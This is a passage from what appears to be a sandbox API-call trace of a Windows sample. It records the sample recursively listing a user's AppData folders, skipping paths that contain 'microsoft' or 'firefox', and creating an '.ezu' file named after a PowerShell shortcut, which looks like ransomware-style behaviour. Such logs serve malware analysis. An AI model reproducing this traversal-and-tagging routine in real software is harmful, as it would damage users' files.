onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07358 [0057.583] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.583] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.583] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.583] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.583] PathMatchSpecW (pszFile="Internet Explorer.lnk", pszSpec="*") returned 1 [0057.583] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.583] PathMatchSpecW (pszFile="Notepad.lnk", pszSpec="*") returned 1 [0057.583] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.583] FindClose (in: hFindFile=0xb07358 | out: hFindFile=0xb07358) returned 1 [0057.583] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.583] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Administrative Tools" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools" [0057.583] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0057.583] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0057.584] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.584] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.584] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.584] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.584] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.584] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.584] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.584] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.584] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Maintenance" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance" [0057.584] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0057.584] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb070d8 [0057.585] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.585] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.585] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.585] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.585] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.585] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.585] PathMatchSpecW (pszFile="OneDrive.lnk", pszSpec="*") returned 1 [0057.585] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.585] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Startup" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0057.585] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0057.585] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb071d8 [0057.586] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.586] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.586] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.586] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.586] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.586] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.586] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="System Tools" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools" [0057.586] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*" [0057.586] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\System Tools\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07158 [0057.587] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.587] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.587] PathMatchSpecW (pszFile="Command Prompt.lnk", pszSpec="*") returned 1 [0057.587] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.587] PathMatchSpecW (pszFile="computer.lnk", pszSpec="*") returned 1 [0057.587] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.587] PathMatchSpecW (pszFile="Control Panel.lnk", pszSpec="*") returned 1 [0057.587] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.587] PathMatchSpecW (pszFile="Default Apps.lnk", pszSpec="*") returned 1 [0057.587] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.588] PathMatchSpecW (pszFile="Desktop.ini", pszSpec="*") returned 1 [0057.588] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.588] PathMatchSpecW (pszFile="Devices.lnk", pszSpec="*") returned 1 [0057.588] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.588] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*") returned 1 [0057.588] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.588] PathMatchSpecW (pszFile="Run.lnk", pszSpec="*") returned 1 [0057.588] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.588] PathMatchSpecW (pszFile="Windows Defender.lnk", pszSpec="*") returned 1 [0057.588] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.588] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.588] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.588] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Windows PowerShell" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell" [0057.588] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*" [0057.588] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Windows PowerShell\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb070d8 [0057.589] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.589] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.589] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.589] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.589] PathMatchSpecW (pszFile="Windows PowerShell (x86).lnk", pszSpec="*") returned 1 [0057.589] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.589] PathMatchSpecW (pszFile="Windows PowerShell ISE (x86).lnk", pszSpec="*") returned 1 [0057.589] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.589] PathMatchSpecW (pszFile="Windows PowerShell ISE.lnk", pszSpec="*") returned 1 [0057.589] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.589] PathMatchSpecW (pszFile="Windows PowerShell.lnk", pszSpec="*") returned 1 [0057.589] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.589] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.589] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.590] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.590] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.590] FindClose (in: hFindFile=0xb07318 | out: hFindFile=0xb07318) returned 1 [0057.590] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.590] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Templates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates" [0057.590] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0057.590] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07358 [0057.590] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.590] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.591] FindClose (in: hFindFile=0xb07358 | out: hFindFile=0xb07358) returned 1 [0057.591] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.591] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Themes" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes" [0057.591] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0057.591] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb070d8 [0057.591] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.591] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.591] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="CachedFiles" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles" [0057.591] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*" [0057.591] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07158 [0057.592] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.592] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.592] PathMatchSpecW (pszFile="CachedImage_1440_900_POS4.jpg", pszSpec="*") returned 1 [0057.592] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.592] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.592] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.592] PathMatchSpecW (pszFile="TranscodedWallpaper", pszSpec="*") returned 1 [0057.592] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.592] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.592] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.592] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.593] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0057.593] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.593] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 1 [0057.593] PathCombineW (in: pszDest=0x9ae4c8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun" [0057.593] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*" [0057.593] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\*", lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0xb07558 [0057.593] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.593] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.593] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun", pszFile="Java" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" [0057.593] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*" [0057.594] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0057.594] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.594] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.594] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java", pszFile="Deployment" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment" [0057.594] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*" [0057.594] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Deployment\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07218 [0057.594] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.594] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.594] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.595] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.595] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.595] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 0 [0057.595] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.595] FindNextFileW (in: hFindFile=0xb07498, lpFindFileData=0x9ae278 | out: lpFindFileData=0x9ae278) returned 0 [0057.595] FindClose (in: hFindFile=0xb07498 | out: hFindFile=0xb07498) returned 1 [0057.596] PathFindExtensionW (pszPath="Windows PowerShell (x86).lnk") returned=".lnk" [0057.596] PathCombineW (in: pszDest=0x9af4a0, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="Windows PowerShell (x86).ezu" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu" [0057.596] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Windows PowerShell (x86).ezu" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\windows powershell (x86).ezu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x15e89c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0057.597] CloseHandle (hObject=0x210) returned 1 [0057.597] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0 [0057.598] GetNamedSecurityInfoW () returned 0x0 [0057.598] LocalFree (hMem=0xb13f30) returned 0x0 [0057.598] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpSrch="microsoft") returned 0x0 [0057.598] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpSrch="firefox") returned 0x0 [0057.598] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*" [0057.598] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\*", lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 0xb070d8 [0057.599] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0057.599] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ae4b0 | out: lpFindFileData=0x9ae4b0) returned 1 [0057.599] PathCombineW (in: pszDest=0x9ae2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe" [0057.599] PathIsDirectoryEmptyW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0 [0057.599] GetNamedSecurityInfoW () returned 0x0 [0057.600] LocalFree (hMem=0xb0e5e8) returned 0x0 [0057.600] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", lpSrch="microsoft") returned 0x0 [0057.600] StrStrIW (lpFirst="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", lpSrch="firefox") returned 0x0 [0057.600] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*" [0057.600] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 0xb07158 [0057.600] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.600] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ae018 | out: lpFindFileData=0x9ae018) returned 1 [0057.600] PathCombineW (in: pszDest=0x9ade10, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\WI2yhmtI 